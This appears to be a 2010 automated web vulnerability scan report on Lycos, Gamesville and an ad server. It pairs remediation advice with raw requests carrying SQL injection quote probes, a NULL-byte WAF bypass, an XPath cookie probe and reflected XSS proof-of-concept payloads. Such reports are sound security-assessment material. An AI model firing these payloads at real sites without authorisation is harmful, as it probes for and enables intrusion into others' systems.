SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/6pm-1460' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31816
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/best-buy-560' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:42 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/buy-com-233' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:00 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/dell-home-638' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:46 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31826
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/ebay-50' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:40 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:40 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31814
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/itunes-music-store-1414' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:49 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:49 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/jcpenney-320' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:33 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31824
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/kohls-1009' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:57 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:57 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31820
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/sony-style-716' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:31:43 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:31:43 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 3, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be Oracle.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /deals/stores/walmart-321' HTTP/1.1 Host: deals.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:32:22 GMT Server: Apache X-Powered-By: PHP/5.1.6 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:22 GMT; path=/ Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31822
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/deals/stores/teleflora-1489"> ...[SNIP]...
1.11. http://www.gamesville.com/cash/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.gamesville.com
Path:
/cash/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /cash/?1%00'=1 HTTP/1.1 Host: www.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;
Response 1
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:25 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]... <div class="greet"> Failure is not falling down; it is not getting up again. </div> ...[SNIP]...
Request 2
GET /cash/?1%00''=1 HTTP/1.1 Host: www.gamesville.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=1.1292163879.1.1.utmcsr=lycoshome|utmccn=home_gamesville|utmcmd=left_nav; __utma=1.681918548.1292163879.1292163879.1292163879.1; __utmc=1; __utmb=1.2.10.1292163879;
Response 2
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:26:26 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24770
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The PENTA cookie appears to be vulnerable to XPath injection attacks. The payload " was submitted in the PENTA cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Issue background
XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.
Issue remediation
User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.
Request
GET /default.asp?query=travel&loc=travel HTTP/1.1 Host: search.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; LYCOS_SEARCH=cbj2lg14aonfk1qmdrqh7puk17; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A; __utmz=1.1292163890.1.1.utmcsr=lycos.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1727943292.1292163890.1292163890.1292163890.1; PENTA=174.121.222.18.1292163893857460"; __utmc=1; __utmb=1.4.10.1292163890;
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 14:36:37 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:36:37 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 61214
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Lycos Search Resu ...[SNIP]... <a rel="nofollow" href="http://154875.r.msn.com/?ld=4vaSWBScKlAQ0JzlRqBOSqd9mPt_uvO1gdfOmHwv90hRyPKKcgcnM6FN7I-VDRwbnjr8DZ823IZOENRt_X7g6SCz0wOBPwoPo71vZO7GBXPaTHnE3eErmrTQu0_ozbxxVG-4BrJtFY1dnOJf3QXjmorN_Iwk4B2K2GvOJBwQ4bKdPW6LcLNOsQ9GU1lqIyLG3hspNM_cqfuwDpWsuTmlzwBOhfocQ5Vl1zIj3IRUp_3wj_fB9_Z7wcSVI1uw64qAiKC_SDmwNbMjtQPRetaVVbzWzxJLTD3kV8I1GO46TqUnc1VAlMlH5mb ...[SNIP]...
3. Cross-site scripting (reflected)previous There are 380 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload fa4f7<script>alert(1)</script>eae69146b28 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /adfa4f7<script>alert(1)</script>eae69146b28/cm.idg_b2c/ HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 69 Date: Sun, 12 Dec 2010 14:26:56 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 27ca2<script>alert(1)</script>2c491182556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ad27ca2<script>alert(1)</script>2c491182556/idgt.lycos/;tile=1;sz=728x90;ord=123456789?\ HTTP/1.1 Host: a.collective-media.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc-dal; optout=1; JY57=opt_out;
Response
HTTP/1.1 404 Not Found Server: nginx/0.7.65 Content-Type: text/html Content-Length: 109 Date: Sun, 12 Dec 2010 14:26:55 GMT Connection: close Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbf0b'-alert(1)-'46a749859b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
